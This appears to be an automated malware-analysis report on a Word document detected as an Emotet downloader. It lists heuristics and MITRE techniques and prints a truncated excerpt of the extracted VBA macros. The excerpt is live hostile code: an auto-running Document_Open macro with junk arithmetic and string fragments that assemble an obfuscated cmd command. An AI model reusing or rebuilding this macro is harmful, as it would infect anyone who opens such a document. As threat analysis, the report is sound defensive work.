MALICIOUS
222
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with the signature 'Doc.Downloader.Emotet-6958975-0', strongly suggesting the Emotet family. Static analysis revealed the presence of VBA macros, specifically a 'Document_Open' macro that utilizes the 'Shell()' function. This indicates the macro's intent is to execute an external command, typically for downloading and running a subsequent payload. The heuristic firings and the known behavior of Emotet align with this attack pattern.
Heuristics 6
-
ClamAV: Doc.Downloader.Emotet-6958975-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Downloader.Emotet-6958975-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 26799 bytes |
SHA-256: ca2e38c3708922723f2df95425311fdd2de86cbd1a761eaa5dc4de523bb4f4c3 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VDGXMwsfMYfDMh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function kkTXCklrRGO()
sOdBrw = PKDSS + VOUqR + 64143 * MHRBG - 28117 / wJZTI
oHnzI = jmjAmr + zHzCv + 53718 * dlwcv - 54846 / WFkkKi
WGQlq = bShRA + hWQBz + 48932 * BtEFJ - 44165 / VStNJ
GhqJGa = YRPOD + pLWYj + 70896 * DLLEjw - 25066 / wQbNTQ
End Function
Private Sub Document_open()
On Error Resume Next
pqTWwR = ZMqLa + MdvLXF + 65682 * WqjEG - 61811 / HOkzD
JwQHQ = zGTni + mvPWFR + 79219 * vbZtQj - 15095 / aRjUqn
udcTzl = MhuqFw + MPjqk + 78341 * Kwdhj - 85689 / Haclq
tSMPN = KtRhj + IKXiY + 72847 * wGzoi - 66711 / uCTov
NLloC = Application.Run("jtMBIauc", "" + zSAiVzhZU + OnkJShJMT + CVar("c") + RqlDSwGMWujO + WbMXpRPXnROWF + imFjvPhwCo + OzPnCQvXMiK + dzmjizBQ + jsdzpjhFZf + GFUzwsvzl + BTQSzlBvA + iUYLwQucvF + dbXsBjjvG + ddSHD + pZqYVN + jQuORiEz + jCmih + WWniVw + RJpzA + NmifqdF + vOZAZjYCwYkO + jwKEUjjwlTskF)
QWDSO = aoiznS + XOMkRn + 59258 * LNdWsK - 53812 / HUImAf
FPUri = VQkPl + tfJvdY + 39400 * iamJiA - 95313 / GIoiRl
End Sub
Function cvzzajN()
wNULYV = zvFGYB + zEizYr + 72259 * KLFjwT - 56922 / EivQO
THGPK = diTdwl + hsSjzN + 6123 * FpWHT - 73619 / bckUl
jtctA = OfEJZw + XwNbc + 59227 * brHqjo - 83939 / jljQrr
AHWXW = SkUaSK + OQRTbz + 1758 * iTjhC - 40126 / MahVJL
rSbaq = cmFChB + MMMTBK + 97031 * SkIrJ - 57405 / qtbzj
End Function
Attribute VB_Name = "inRviPhZwqsabI"
Function imFjvPhwCo()
On Error Resume Next
uRzXPR = (WAKiqG + LZUBB * 14772 + GDYvdq)
LSUUJGI = CStr(Chr(YnhIhhtndsHNPR + VXAOiRfRaO + 109 + hlpOIwo + SMupkhTKfBt)) + "d " + "/" + CStr(Chr(ljvJSGIQhTjnF + sETdhtC + 99 + ZukLGvN + pzGTwihFLktOBi)) + " ^" + "Fo^R " + " " + "; , /F" + " ; " + CStr(Chr(SaiQawiZp + WwJmGYpQrw + 34 + ovbhSRq + uuoUfqXqR)) + " t"
QfNVp = 65612 * MnXitR / hFEYIq + KXYBo - 27003 - 48574
bnXitD = 56302 * ZdiHOi / rpKrq + RAIBG - 13915 - 79084
YEnFtRj = "o" + "ke" + "ns= 2" + " de" + "li" + CStr(Chr(PFKJBwmqLOw + UtUwRQIzMJbBV + 109 + hRZaQvqjkSf + AMAwavAlWZZ)) + "s=" + "Jf=" + CStr(Chr(iCwjHjjLIt + DzdJjflvdz + 34 + fbZRpLsz + RnmBLwnTrSLYW)) + " " + ","
SkBwu = 41906 * wdcSzf / NvtzJ + DilMKn - 27648 - 55780
oRXJPW = 26429 * iWCLNO / RUBoK + pLCQk - 97706 - 77832
HJKho = 1567 * VsqiLV / wrUXFs + Nodiw - 12920 - 40812
tDnfatjhzdw = " , %^" + "E " + " ; ^" + "In , " + "," + " ( ;"
ZwXOt = 1203 * ZFqzIw / BUYGYP + itouUh - 97178 - 80199
cMSIP = 96409 * Crpzz / TEqBh + iOUQwq - 4510 - 66448
aUYDUkjEzqL = " ' " + "; " + " AS" + "S" + "o^^" + CStr(Chr(cmuoFufDoD + PVzBqwMf + 99 + hTmIKHhwGE + NYzKTzmkwzfrXz)) + " ," + " " + ", ." + CStr(Chr(VaKShFEbC + XVrzcfVIYEfi + 99 + EYjoukNMQbjtI + UWIXNOOG)) + CStr(Chr(MCpWMqv + cjUmHMWLFQ + 109 + WIzDhWHBipRj + hXpEklzjkbzj)) + "d" + " '" + " "
hkLjX = 93515 * TlWAEh / dirVpi + RLLrHv - 41928 - 34738
FlHjaUYH = "; " + ", " + " )" + " , ^" + "D^o ; " + ", " + "%^E;" + " , 6" + "y" + "gTQ" + "n/^v"
dYHNo = 36103 * HLhvHi / nqTIK + fumQY - 661 - 83604
PXbcJShPtfY = "^5^LV " + " ; ; " + "6Je" + "2P/r " + " " + CStr(Chr(qCJqkUpu + iTntumPlC + 34 + wVAffknXYEw + LbjbwQsniXaRzD)) + " , " + " ; ( " + "(" + "S^" + "et ^ "
BYGwa = 17305 * PuYZh / wVEch + FCKCC - 46771 - 67662
pnbfGB = 61902 * AljiX / Nmnzb + uTXKwv - 14299 - 83574
QKoDzTjRIcM = " [^;." + "=^" + "bnE:" + "y^o" + "L^" + ";^a" + "d" + "UxpI6^" + "Z}^" + "@fteWl" + "Bj-qG="
rXaaG = 95154 * aRSzEr / phwwQO + IwzVQR - 68570 - 21856
AvNsGz = 56926 * otWJW / PjMGOJ + Fpzjad - 9123 - 81765
UVSpjKE = "$" + "^" + "K7" + CStr(Chr(MOhbfrhIKFjBWQ + zqiSGnmljrQ + 99 + OhjzZMqQuRU + QtjrQRIuTH)) + "^" + "s'A{Dk" + "^)" + "^" + CStr(Chr(rYbvunbiiw + CwEYODY + 109 + jXsFpbwpju + dinOVzdt)) + "1S" + "^v/"
XdwId = 9288 * kUqcVE / aCGkEd + ktvGQJ - 61077 - 38488
IjGls = 93572 * CHXdo / dUskA + wGbhSm - 68721 - 5786
qXicivjr = "^"
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.